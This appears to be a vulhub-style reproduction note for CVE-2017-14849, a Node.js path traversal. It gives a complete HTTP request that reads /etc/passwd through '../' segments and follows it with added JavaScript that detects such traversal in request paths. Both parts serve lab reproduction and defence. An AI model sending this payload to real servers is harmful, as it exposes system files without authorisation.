Vulnerability details
For details, see: https://vulhub.org/#/environments/node/CVE-2017-14849/
Reproducing the vulnerability
Sending the following request reads the file:
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
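
A detection-side check for the request above, as an added example that is not part of the original post: it walks the request path one segment at a time and flags any target that climbs above the static mount, without calling path.normalize() or path.resolve(). The names escapesMount and flagRequestLines are hypothetical, the /static/ mount is taken from the request path, and the sample request lines are constructed.

```javascript
'use strict';

// Returns true when the request target climbs above `mount` at any point.
// The walk is done by hand so the verdict does not depend on the runtime's
// own path normalization.
function escapesMount(requestTarget, mount) {
  // Drop query string and fragment, then percent-decode once.
  let pathname = requestTarget.split(/[?#]/, 1)[0];
  try {
    pathname = decodeURIComponent(pathname);
  } catch (e) {
    return true; // malformed percent-encoding: treat as suspicious
  }
  pathname = pathname.replace(/\\/g, '/');
  if (pathname.includes('\0')) return true;
  if (!pathname.startsWith(mount)) return false; // not under the static route

  let depth = 0; // directories below the mount at the current segment
  for (const seg of pathname.slice(mount.length).split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      depth -= 1;
      if (depth < 0) return true; // went above the mount
    } else {
      depth += 1;
    }
  }
  return false;
}

// Constructed sample request lines; the first is the request shown above.
const SAMPLE_REQUEST_LINES = [
  'GET /static/../../../a/../../../../etc/passwd HTTP/1.1',
  'GET /static/css/../js/app.js HTTP/1.1',
  'GET /static/%2e%2e/%2e%2e/etc/passwd HTTP/1.1',
  'GET /static/img/logo.png?v=.. HTTP/1.1',
  'GET /api/users HTTP/1.1',
];

// Returns the request lines whose target escapes the mount.
function flagRequestLines(lines, mount) {
  return lines.filter((line) => {
    const parts = line.split(' ');
    return parts.length === 3 && escapesMount(parts[1], mount);
  });
}

console.log(flagRequestLines(SAMPLE_REQUEST_LINES, '/static/'));
```

The same function can sit in front of a static file handler as a reject-early filter or be run over access logs after the fact.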